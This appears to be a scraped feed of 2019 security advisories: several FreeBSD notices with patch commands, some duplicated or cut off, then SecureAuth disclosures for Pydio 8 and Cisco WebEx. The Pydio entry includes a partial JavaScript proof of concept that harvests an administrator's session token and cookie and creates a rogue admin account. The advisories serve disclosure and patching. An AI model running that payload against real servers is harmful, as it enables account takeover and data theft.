https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc # gpg --verify mds.11-stable.patch.asc [FreeBSD 11.2-RELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc # gpg --verify mds.11.2.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html>. Mitigation
FreeBSD Security Advisory FreeBSD-SA-19:07.mds
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:07.mdsSecurity Advisory The FreeBSD Project Topic: Microarchitectural Data Sampling (MDS) Category: core Module: kernel Announced: 2019-05-14 Credits:Refer to Intel's security advisory at the URL below for detailed acknowledgements. Affects:All supported versions of FreeBSD. Corrected: 2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE) 2019-05-15 13:44:27 UTC (releng/12.0, 12.0-RELEASE-p5) 2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. 0. Revision history v1.0 2019-05-14 Initial release. v1.1 2019-05-15 Fixed date on microcode update package. v1.2 2019-05-15 Userland startup microcode update details added. Add language specifying which manufacturers is affected. v1.3 2019-05-15 Minor quoting nit for the HT disable loader config. v2.0 2019-05-15 Rerelease 12.0-RELEASE patch as -p5 due to i386 panic bug. I. Background Modern processors make use of speculative execution, an optimization technique which performs some action in advance of knowing whether the result will actually be used. II. Problem Description On some Intel processors utilizing speculative execution a local process may be able to infer stale information from microarchitectural buffers to obtain a memory disclosure. III. Impact An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser). IV. Workaround No workaround is available. Only Intel x86 based processors are affected. x86 processors from other manufacturers (eg, AMD) are not believed to be vulnerable. Systems with users or processors in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0: # echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf # shutdown -r +10min "Security update" V. Solution Perform one of the following: Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, evaluate mitigation and Hyper Threading controls, and reboot the system. New CPU microcode may be available in a BIOS update from your system vendor, or by installing the devcpu-data package or sysutils/devcpu-data port. Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14. If using the package or port the Intel microcode update can be applied at boot time (only on FreeBSD 12 and later) by adding the following lines to the system's /boot/loader.conf: cpu_microcode_load="YES" cpu_microcode_name="/boot/firmware/intel-ucode.bin" To automatically load microcode during userland startup (supported on all FreeBSD versions), add the following to /etc/rc.conf: microcode_update_enable="YES" 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Follow additional details under "Mitigation Configuration" below. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [*** v2.0 NOTE *** Only applies to 12.0-RELEASE ***] Due to an error in the 12.0-RELEASE affecting the i386 architecture, a new set of patches is being released. If your 12.0-RELEASE sources are not yet patched using the initially published patch, then you need to apply the mds.12.0.patch. If your sources are already updated, or patched with the patch from the initial advisory, then you need to apply the incremental patch, named mds.12.0.p4p5.patch [FreeBSD 12.0-STABLE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc # gpg --verify mds.12-stable.patch.asc [FreeBSD 12.0-RELEASE, not patched with initial SA-19:07.mds patch] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc # gpg --verify mds.12.
FreeBSD Security Advisory FreeBSD-SA-19:07.mds
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:07.mdsSecurity Advisory The FreeBSD Project Topic: Microarchitectural Data Sampling (MDS) Category: core Module: kernel Announced: 2019-05-14 Credits:Refer to Intel's security advisory at the URL below for detailed acknowledgements. Affects:All supported versions of FreeBSD. Corrected: 2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE) 2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background Modern processors make use of speculative execution, an optimization technique which performs some action in advance of knowing whether the result will actually be used. II. Problem Description On some Intel processors utilizing speculative execution a local process may be able to infer stale information from microarchitectural buffers to obtain a memory disclosure. III. Impact An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser). IV. Workaround No workaround is available. Systems with users or processors in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0: # echo 'machdep.hyperthreading_allowed=0 >> /boot/loader.conf' # shutdown V. Solution Perform one of the following: Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, evaluate mitigation and Hyper Threading controls, and reboot the system. New CPU microcode may be available in a BIOS update from your system vendor, or by installing the devcpu-data package or sysutils/devcpu-data port. Ensure that the BIOS update or devcpu-data package is dated after 2014-05-14. If using the package or port the microcode update can be applied at boot time by adding the following lines to the system's /boot/loader.conf: cpu_microcode_load="YES" cpu_microcode_name="/boot/firmware/intel-ucode.bin" Microcode updates can also be applied while the system is running. See cpucontrol(8) for details. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Follow additional details under "Mitigation Configuration" below. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0-STABLE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc # gpg --verify mds.12-stable.patch.asc [FreeBSD 12.0-RELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc # gpg --verify mds.12.0.patch.asc [FreeBSD 11.3-PRERELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc # gpg --verify mds.11-stable.patch.asc [FreeBSD 11.2-RELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc # gpg --verify mds.11.2.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html>. Mitigation Configuration Systems with users, processes, or virtual machines in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0: # echo machdep.hyperthreading_allowed=0 >> /boot/loader.conf To activate the MDS mitigation set the hw.mds_disable sysctl. The settings are: 0 - mitigation disabled 1 - VERW instruction (microcode) mitigation enabled 2 - Software sequence mitigation enabled (not recommended) 3 - Automatic VERW or Software selection Automatic mode uses the V
FreeBSD Security Advisory FreeBSD-SA-19:05.pf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:05.pf Security Advisory The FreeBSD Project Topic: IPv6 fragment reassembly panic in pf(4) Category: contrib Module: pf Announced: 2019-05-14 Credits:Synacktiv Affects:All supported versions of FreeBSD Corrected: 2019-03-01 18:12:05 UTC (stable/12, 12.0-STABLE) 2019-05-14 23:10:21 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-03-01 18:12:07 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:10:21 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2019-5597 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background pf(4) is an Internet Protocol packet filter originally written for OpenBSD. In addition to filtering packets, it also has packet normalization capabilities. II. Problem Description A bug in the pf(4) IPv6 fragment reassembly logic incorrectly uses the last extension header offset from the last received packet instead of from the first packet. III. Impact Malicious IPv6 packets with different IPv6 extensions could cause a kernel panic or potentially a filtering rule bypass. IV. Workaround Only systems leveraging the pf(4) firewall and include packet scrubbing using the recommended 'scrub all in' or similar are affected. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterwards, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch # fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch.asc # gpg --verify pf.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r344706 releng/12.0/ r347591 stable/11/r344707 releng/11.2/ r347591 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://www.synacktiv.com/ressources/Synacktiv_OpenBSD_PacketFilter_CVE-2019-5597_ipv6_frag.pdf> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5597> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:05.pf.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTsNfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cL1cxAAjYy90WBfuBkU/FddQWMJkXOn2YqABFxY/BfFpJEbGrnXXuxz9YJByK3b 6ikWq5HcxgL/9ek6QULwEOoNvms8tT4m4waJOLa3hZPoPlgD2ArgvdcEI00R/8T9 Z+k1YlT0oLOY4XbVynPGNmiFNTAcsg7Ognp9yam3kmPZTMGYm6cKIBy1idrzCCmI nj0SscyoL4Z09kSWe3UOitjh8cpxqGuvGosCb7YGPl6yTSalBUgP44Lyg7jS4nrZ xjZxqhAfp7tk9peF4rov8apZIsrBF5GMaahnIGIwZzmRn/E1pND9qx1lB1Uh7rfR nb8OmwbshJTWdnS1GXyLxRGJOd0zmh+YZ10ygZAQTM5sNaxfn6pWJFmr2S/mR+kN RG/Bhj+lN7jh1eUNdwk/pAm0aZZ+J8GX4/QOrqPfGDko/s/S7YwJB/DKR/14uPY7 Fwcgv4tvgoRstSKHdIe45d7/N0SgQCS/EfzVIO5XPQtkrk9/zalQubionijObr1Q ARVl7H5M7m7kP8PJz/vRNvhar0c0xTk9ov2JDxKHKTd+7D78LQEAFvEGPIFREBsY VBW8BqZbuVcsgrhr/YWFE3TEw4O0YbnY5g9wmVv+d/pdDngLuTsfbNEsAQewWcu/ dYefeBMKBukyLUKtLYHjVAhUlL3hF3
FreeBSD Security Advisory FreeBSD-SA-19:06.pf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:06.pf Security Advisory The FreeBSD Project Topic: ICMP/ICMP6 packet filter bypass in pf Category: contrib Module: pf Announced: 2019-05-14 Credits:Synacktiv Affects:All supported versions of FreeBSD Corrected: 2019-03-21 14:17:10 UTC (stable/12, 12.0-STABLE) 2019-05-14 23:12:22 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-03-21 14:17:12 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:12:22 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2019-5598 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background pf(4) is an Internet Protocol packet filter originally written for OpenBSD. In addition to filtering packets, it also has packet normalization capabilities. II. Problem Description States in pf(4) let ICMP and ICMP6 packets pass if they have a packet in their payload matching an existing condition. pf(4) does not check if the outer ICMP or ICMP6 packet has the same destination IP as the source IP of the inner protocol packet. III. Impact A maliciously crafted ICMP/ICMP6 packet could bypass the packet filter rules and be passed to a host that would otherwise be unavailable. IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterwards, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch # fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch.asc # gpg --verify pf.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r345377 releng/12.0/ r347593 stable/11/r345378 releng/11.2/ r347593 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://www.synacktiv.com/posts/systems/icmp-reachable.html> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5598> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:06.pf.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTsdfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIjXA/9FevC+Ygihzb0J9MN0znEM883dk5sPCSvMwiivsNRkDMXreYqPXU+Fkt0 iV1OZ8tKwKAihm+iGJ5mzS5l40wWF1oDcqJrC0myICdvreraoJKZvTLhgGIBqKkE b8yIuzPueWdnnudoAzTV38RhyaP2aOb44OMUNPQZsEB/6hHsNvp9m6yAua/F+x9+ N9J38Y/C6udsNfhqDeuCI4G8yiN33XfFiRbF+31rt3s0rUm6KGNsJanJe8dNAEvE DN4tA4+MORnQ7QTLgOobGuLFhWJ2urC6psH8duO72hcSTzSkTZpxrC3f6SW8RlZ+ Pbr4LZ6FA3bZp/sCmWPOot94hotBDr03MZwrxURokeDHZU1nUBsw0rmTG4aypujl JrGPOAp89TtqrR0zV8DhpGO/RWoBeMDf7ZGvIplOIEF5rijQWEyC5pnYlBKPfSdm UTxcN9RoJCfz7O4KLAAqhHiuu6xc+CqlQH1dvyLbqGVv9LzUQlziTNsbQ4cGryuj g1TztU0VfpvHDkAKBh0iHwkoUqDSut3K19rFAQ3zkM/EodqSTkE1OG77pmsjYaVq AfcnN/se8lklq0lKi3BwNvVIWTjhMAwY63otVxvVD4wrJrgQH8NKgOeYuGBreXeW Uv569bIhR0/vsyGJK/SMKxBiAGfzkE7LqDMJqdXLsompX97nOwI= =m3as -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-19:03.wpa
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:03.wpaSecurity Advisory The FreeBSD Project Topic: Multiple vulnerabilities in hostapd and wpa_supplicant Category: contrib Module: wpa Announced: 2019-05-14 Affects:All supported versions of FreeBSD. Corrected: 2019-05-01 01:42:38 UTC (stable/12, 12.0-STABLE) 2019-05-14 22:57:29 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-05-01 01:43:17 UTC (stable/11, 11.2-STABLE) 2019-05-14 22:59:32 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2019-9494, CVE-2019-9495, CVE-2019-9496, CVE-2019-9497, CVE-2019-9498, CVE-2019-9499, CVE-2019-11555 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background Wi-Fi Protected Access II (WPA2) is a security protocol developed by the Wi-Fi Alliance to secure wireless computer networks. hostapd(8) and wpa_supplicant(8) are implementations of user space daemon for access points and wireless client that implements the WPA2 protocol. II. Problem Description Multiple vulnerabilities exist in the hostapd(8) and wpa_supplicant(8) implementations. For more details, please see the reference URLs in the References section below. III. Impact Security of the wireless network may be compromised. For more details, please see the reference URLS in the References section below. IV. Workaround No workaround is available, but systems not using hostapd(8) or wpa_supplicant(8) are not affected. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterwards, restart hostapd(8) or wpa_supplicant(8). 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, restart hostapd(8) or wpa_supplicant(8). 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch # fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch.asc # gpg --verify wpa-12.patch.asc [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch # fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch.asc # gpg --verify wpa-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart the applicable daemons, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r346980 releng/12.0/ r347587 stable/11/r346981 releng/11.2/ r347588 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://w1.fi/security/2019-1> https://w1.fi/security/2019-2> https://w1.fi/security/2019-3> https://w1.fi/security/2019-4> https://w1.fi/security/2019-5> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9494> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9495> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9496> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9497> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9498> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9499> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11555> The latest revision of this advis
FreeBSD Security Advisory FreeBSD-SA-19:04.ntp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:04.ntpSecurity Advisory The FreeBSD Project Topic: Authenticated denial of service in ntpd Category: contrib Module: ntp Announced: 2019-05-14 Credits:Magnus Stubman Affects:All supported versions of FreeBSD Corrected: 2019-03-07 13:45:36 UTC (stable/12, 12.0-STABLE) 2019-05-14 23:02:56 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-03-07 13:45:36 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:06:26 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2019-8936 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP) used to synchronize the time of a computer system to a reference time source. The ntpd(8) daemon uses a protocol called mode 6 to both get status information from the running ntpd(8) daemon and configure it on the fly. This protocol is typically used by the ntpq(8) program, among others. II. Problem Description A crafted malicious authenticated mode 6 packet from a permitted network address can trigger a NULL pointer dereference. Note for this attack to work, the sending system must be on an address from which the target ntpd(8) accepts mode 6 packets, and must use a private key that is specifically listed as being used for mode 6 authorization. III. Impact The ntpd daemon can crash due to the NULL pointer dereference, causing a denial of service. IV. Workaround Use 'restrict noquery' in the ntpd configuration to limit addresses that can send mode 6 queries. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, restart the ntpd service: # service ntpd restart 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch # fetch https://security.FreeBSD.org/patches/SA-19:04/ntp.patch.asc # gpg --verify ntp.patch.asc [FreeBSD 11.2-RELEASE/11.3-PRERELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:04/ntp-11.2.patch.asc # gpg --verify ntp-11.2.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart the ntpd service, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r344884 releng/12.0/ r347589 stable/11/r344884 releng/11.2/ r347590 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References http://support.ntp.org/bin/view/Main/SecurityNotice#March_2019_ntp_4_2_8p13_NTP_Rele> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:04.ntp.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTrdfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cLGtw/8CNAYnLxARrMUK1QeC9sE7EaboYInSOgaunf
[SAUTH-2019-0002] - Pydio 8 Multiple Vulnerabilities
SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ Pydio 8 Multiple Vulnerabilities 1. *Advisory Information* Title: Pydio 8 Multiple Vulnerabilities Advisory ID: SAUTH-2019-0002 Advisory URL: https://www.secureauth.com/labs/advisories/pydio-8-multiple-vulnerabilities Date published: 2019-03-28 Date of last update: 2019-03-28 Vendors contacted: Pydio Release mode: Coordinated release 2. *Vulnerability Information* Class: Argument Injection or Modification [CWE-88], Argument Injection or Modification [CWE-88], Information Exposure [CWE-200], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Information Exposure [CWE-200], Information Exposure [CWE-200] Impact: Code execution, Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2019-10049, CVE-2019-10048, CVE-2019-10045, CVE-2019-10047, CVE-2019-10046, CVE-2019-10046 3. *Vulnerability Description* Pydio [1] website states that: ...Pydio, an open source EFSS (Enterprise File Synchronization and Sharing) solution that can be deployed On-Premise or in a Hybrid / Cloud environment. Pydio is available either through a Community distribution (Ideal for home use) that is free forever or an Enterprise which provides all the features, support and compliance to secure file sharing. Pydio is sold in more than 25 countries, from Cupertino to Singapore, and is used by leading brands around the world, such as Nikon, Credit Agricole, Dexia... Pydio also serves education and government clients, with major references such as Cambridge University (UK) and ADEME (France). Multiple vulnerabilities were found in Pydio 8 (latest version 8.2.2), which allows an attacker with regular user access to the application and by tricking an administrator account to open a shared URL bookmark through the application, to obtain the victim's session identifiers in order to impersonate him/her and to perform actions such as create a new user administrator account. After gaining privileged access to the application the attacker can leverage another vulnerability to perform OS command injection under the privileges of the user account running the web server. 4. *Vulnerable Packages* . Pydio 8.2.2 - Latest version at the time of testing. . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* Pydio published v8.2.3 that fixes all the reported vulnerabilities. 6. *Credits* These vulnerabilities were discovered and researched by Ramiro Molina from SecureAuth Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Privilege escalation vector based in multiple vulnerabilities* [CVE-2019-10049] By chaining vulnerabilities it is possible for an attacker with regular user access to the web application to attempt to trick an administrator user to open a link shared through the application, that in turn opens a shared file that contains JavaScript code that is executed in the context of the victim user to obtain sensitive information such as session identifiers (session cookie and secure token) and perform actions on behalf of him/her. Note: if the targeted users are not administrators, any other action on behalf of that user could also be achieved, to for example obtain sensitive files stored in their accounts or impersonate them. Attack vector steps: 1. Authenticated in the web application with a regular user account, go to "My Files" and upload a file named for example pydio_xss.html (use the .html extension) with the following content. The PoC once executed performs several requests to: . Obtain a "secure_token" for the user, which is a CSRF prevention token. . Obtain the session cookie for the current user. . Send the two sensitive tokens to the attacker, this allows to impersonate the victim user. . Change the "context to configuration". . Create a new user account named "admin99" with password "password1". . Change the user role of the created user to administrator. Note: change the IP address and port number (the example ones are the IP 192.168.56.1 and port ). PoC pydio_xss.html file: /- console.log("Starting..."); var req0 = new XMLHttpRequest(); req0.open('GET', "/welcome/", true); req0.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); req0.send(); req0.onload = function() { var res = req0.responseText.match(/SECURE_TOKEN.*?,/)[0]; var secure_token = res.split(/"/)[2] ; var req1 = new XMLHttpRequest(); req1.open('POST', "index.php", true); req1.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); req1.send("get_action=get_sess_id&secure_token=" + secure_token); req1.onlo
[CORE-2018-0012] - Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2 1. *Advisory Information* Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2 Advisory ID: CORE-2018-0012 Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability-version-2 Date published: 2019-02-27 Date of last update: 2019-02-27 Vendors contacted: Cisco Release mode: Coordinated release 2. *Vulnerability Information* Class: OS command injection [CWE-78] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2019-1674 3. *Vulnerability Description* Cisco's Webex Meetings website states that [1]: Cisco Webex Meetings: Simply the Best Video Conferencing and Online Meetings. With Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters. A vulnerability in the update service of Cisco Webex Meetings Desktop App for Windows could allow a local attacker to elevate privileges. 4. *Vulnerable Packages* . Cisco Webex Meetings Desktop App v33.6.4.15 . Cisco Webex Meetings Desktop App v33.6.5.2 . Cisco Webex Meetings Desktop App v33.7.0.694 . Cisco Webex Meetings Desktop App v33.7.1.15 . Cisco Webex Meetings Desktop App v33.7.2.24 . Cisco Webex Meetings Desktop App v33.7.3.7 . Cisco Webex Meetings Desktop App v33.8.0.779 . Cisco Webex Meetings Desktop App v33.8.1.13 . Cisco Webex Meetings Desktop App v33.8.2.7 . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* Cisco informed that released the vulnerability is fixed in Cisco Webex Meetings Desktop App releases 33.6.6 and 33.9.1. In addition, Cisco published the following advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj 6. *Credits* This vulnerability was discovered and researched by Marcos Accossatto from SecureAuth. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Privilege Escalation* [CVE-2019-1674] The update service of Cisco Webex Meetings Desktop App for Windows does not properly validate version numbers of new files. An unprivileged local attacker could exploit this vulnerability by invoking the update service command with a crafted argument 